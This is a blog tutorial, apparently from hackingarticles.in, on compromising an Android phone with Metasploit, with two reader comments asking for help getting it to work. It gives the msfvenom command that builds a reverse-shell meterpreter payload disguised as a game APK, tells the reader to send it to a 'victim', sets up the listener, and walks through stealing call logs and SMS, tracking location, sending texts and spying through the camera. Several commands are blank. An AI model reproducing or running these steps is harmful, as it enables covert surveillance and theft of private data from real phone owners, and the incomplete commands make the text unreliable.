Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit

In 2015 we were using msfpayload and msfencode tools to perform this hack but on June 8th 2015 both msfpayload and msfencode is replaced by msfvenom tool. So simply now msfvenom is an updated combination of Msfpayload and Msfencode tool

Now by using msfvenom we will create meterpreter payload for android.

Open you Kail Linux terminal and type:

msfvenom -p android/meterpreter/reverse_tcp lhost= lport=4444 >/root/Desktop/TempleRun2.apk

Now it will automatically generate the malicious but interesting to install apk files and store it to your Kali Linux desktop.


Send this TempleRun2.apk file to victim mobile, as soon as they open and install it you will get access of victim android mobile.

Now we have to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

Go to your Kali Linux terminal and type: msfconsole

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost

set lport 4444


Now you are in victim android mobile from here you can do many things like:

To check whether victim mobile is rooted or not for this type following command:


Check victim’s mobile exact location type:


it will show the exact location of victim mobile on Google maps

To download victim call logs from their mobile type:


It will download and store txt file of call logs in your root directory


To download sms dump type:


it will also download and store txt file of sms dump in your root directory

To send sms from hacked android mobile phone to someone else type:

send_sms -d “number of the person whom you want to send sms” -t “message you want send”

ex: send_sms -d 9599***847 -t hacked

To capture pic from victim’s mobile camera type:


it will provides you a list of all webcams on the victim mobile then select from the list and type:

webcam_snap 2

to stream live feed from victim’s mobile camera type:


it will automatically open up a browser and you will see live feed from their camera

Author: Akshay Bhardwaj Security Enthusiast and Researcher, Sketch Artist and Technical writer at hackingarticles.in

6 Comments Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit

  1. Mahi Singh

    hello akshay,
    hope you are doing well,
    i just wanted to know that i have applied command which you have mentioned above but i am not able to get access of my mobile on . so can you please help me out.
    thank you

  2. reena

    when i search for my ip in termux by ifconfig there is two internal ip showing Link encap:Local Loopback
    inet addr: Mask:

    Link encap:Ethernet HWaddr DC:1A:C5:10:47:B3
    inet addr: Bcast: Mask:
    so what is the value of lhost and lport for creating payload


Leave a Reply

Your email address will not be published. Required fields are marked *